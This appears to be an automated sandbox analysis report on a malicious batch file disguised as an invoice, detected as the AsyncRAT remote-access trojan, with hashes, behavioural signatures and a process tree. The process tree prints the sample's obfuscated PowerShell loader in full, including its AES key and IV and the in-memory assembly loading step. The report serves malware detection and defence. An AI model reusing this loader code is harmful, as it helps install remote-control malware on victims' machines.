Overview

overview

10

Static

static

1

Invoice 6238829.bat

windows7-x64

7

Invoice 6238829.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/05/2023, 05:56

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice 6238829.bat

  • Size

    410KB

  • MD5

    6cb6cc9ac94bc7ddffa0c81461a6346c

  • SHA1

    b1507f91011e82b4fa25c879b12325cf51ec362f

  • SHA256

    6bbbaa4861b4826eede41ff0c8244cf407435ab64d463b13c639b03588221b65

  • SHA512

    d5f7921821e0a393783058d9e0b8fac13c7fda92a877553289651d7239a979d572b97f9d0b97318aa6ac07edcf1795b2073278c608f2a792b66df5256d35619a

  • SSDEEP

    12288:WAHTazogPBYqCTI59GSvC/DxzfYJMt3p9Wz:5T0oQBfUI5K/lzfpY

Score
10/10
asyncratrat

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Invoice 6238829.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Users\Admin\AppData\Local\Temp\Invoice 6238829.bat.exe
          "Invoice 6238829.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YVsmU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Invoice 6238829.bat').Split([Environment]::NewLine);foreach ($AspDk in $YVsmU) { if ($AspDk.StartsWith(':: ')) { $JHEwF = $AspDk.Substring(3); break; }; };$aylCx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JHEwF);$IvORy = New-Object System.Security.Cryptography.AesManaged;$IvORy.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IvORy.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IvORy.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jNMemEixlY8T21nBn6PMsg+yG1qNTVWlBR8+e+wi04A=');$IvORy.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uwUyHw7Pb2wZQv645+iSsA==');$EKrfZ = $IvORy.CreateDecryptor();$aylCx = $EKrfZ.TransformFinalBlock($aylCx, 0, $aylCx.Length);$EKrfZ.Dispose();$IvORy.Dispose();$jEONv = New-Object System.IO.MemoryStream(, $aylCx);$WSFgZ = New-Object System.IO.MemoryStream;$hYeOu = New-Object System.IO.Compression.GZipStream($jEONv, [IO.Compression.CompressionMode]::Decompress);$hYeOu.CopyTo($WSFgZ);$hYeOu.Dispose();$jEONv.Dispose();$WSFgZ.Dispose();$aylCx = $WSFgZ.ToArray();$vucNV = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($aylCx);$Lufvh = $vucNV.EntryPoint;$Lufvh.Invoke($null, (, [string[]] ('')))
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:364
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\OOP.pdf"
            4⤵
            • Checks processor information in registry
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:4816
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
              5⤵
                PID:4624
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D200C14852900B2055F5B2A6DBDB41CC --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  6⤵
                    PID:1620
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D575C8710BD362F5F6735628F7703560 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D575C8710BD362F5F6735628F7703560 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
                    6⤵
                      PID:1720
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A4815D3305B2C391A2FAD4394DDF03DD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A4815D3305B2C391A2FAD4394DDF03DD --renderer-client-id=4 --mojo-platform-channel-handle=2156 --allow-no-sandbox-job /prefetch:1
                      6⤵
                        PID:3852
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7FAD3B36EE312656F2D850945749090D --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:3736
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4DA560981388913F0F6822A8328DA177 --mojo-platform-channel-handle=2648 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          6⤵
                            PID:3572
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=71699B51B8FF1AED70E6FD2094A2B90A --mojo-platform-channel-handle=2712 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            6⤵
                              PID:5032
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                            5⤵
                              PID:1564
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 364 -s 2712
                            4⤵
                            • Program crash
                            PID:5092
                      • C:\Windows\System32\notepad.exe
                        C:\Windows\System32\notepad.exe
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4652
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -pss -s 188 -p 364 -ip 364
                      1⤵
                        PID:1952
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:4952

                        Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                36KB

                                MD5

                                b30d3becc8731792523d599d949e63f5

                                SHA1

                                19350257e42d7aee17fb3bf139a9d3adb330fad4

                                SHA256

                                b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                                SHA512

                                523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                                Download Submit

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                56KB

                                MD5

                                752a1f26b18748311b691c7d8fc20633

                                SHA1

                                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                SHA256

                                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                SHA512

                                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                Download Submit

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                64KB

                                MD5

                                025f029f0035db7c5343e204e3f0cc4b

                                SHA1

                                11bb5c405b794beeebab8a9eca841abb84b6e383

                                SHA256

                                de42b6b8663847356a5cdbfa3f09aee55eb3a6d85fa0366124a9ac1a18b60caa

                                SHA512

                                ec24511e2bfac01372b2e2f169484e1e08906c4ece9614417cd8bbc4c851baa131893af9a800be2e66769e823215eb78ef95852fb36b5b1106285018f0a6c528

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\Invoice 6238829.bat.exe
                                Filesize

                                442KB

                                MD5

                                04029e121a0cfa5991749937dd22a1d9

                                SHA1

                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                SHA256

                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                SHA512

                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\Invoice 6238829.bat.exe
                                Filesize

                                442KB

                                MD5

                                04029e121a0cfa5991749937dd22a1d9

                                SHA1

                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                SHA256

                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                SHA512

                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\OOP.pdf
                                Filesize

                                105KB

                                MD5

                                a9ab9ec7dd9b66247260a41d173c5c80

                                SHA1

                                0b22f19448a6c5e7cc898ba338a5863a72d8fb72

                                SHA256

                                101e408316eb7997bc4d2a383db92ab5a60da4742ebd7a7b8f15ca5d4d54bebe

                                SHA512

                                8e85d5e376764e6c4761525ce8dd493b42cc31aa1f698cd2644c17a3aaf3e94978be2adf49335abf32fecee9e398ba724543715fbc38dc968f0291c76ffbd78c

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkymrff0.dzm.ps1
                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                Download Submit

                              • memory/364-172-0x0000028272470000-0x00000282724C9000-memory.dmp

                                Filesize

                                356KB

                                Download

                              • memory/364-149-0x000002826FFD0000-0x000002826FFE0000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/364-142-0x00000282721C0000-0x00000282721E2000-memory.dmp

                                Filesize

                                136KB

                                Download

                              • memory/364-168-0x00000282726D0000-0x00000282726D1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/364-171-0x0000028272470000-0x00000282724C9000-memory.dmp

                                Filesize

                                356KB

                                Download

                              • memory/364-153-0x0000028272470000-0x00000282724C9000-memory.dmp

                                Filesize

                                356KB

                                Download

                              • memory/364-147-0x000002826FFD0000-0x000002826FFE0000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/364-148-0x000002826FFD0000-0x000002826FFE0000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/364-163-0x00000282726D0000-0x00000282726D1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4652-175-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-184-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-185-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-186-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-203-0x000001AC236B0000-0x000001AC23726000-memory.dmp

                                Filesize

                                472KB

                                Download

                              • memory/4652-204-0x000001AC098F0000-0x000001AC0990E000-memory.dmp

                                Filesize

                                120KB

                                Download

                              • memory/4652-207-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-174-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-173-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/4652-166-0x000001AC07D90000-0x000001AC07DA5000-memory.dmp

                                Filesize

                                84KB

                                Download

                              • memory/4652-306-0x000001AC22370000-0x000001AC22380000-memory.dmp

                                Filesize

                                64KB

                                Download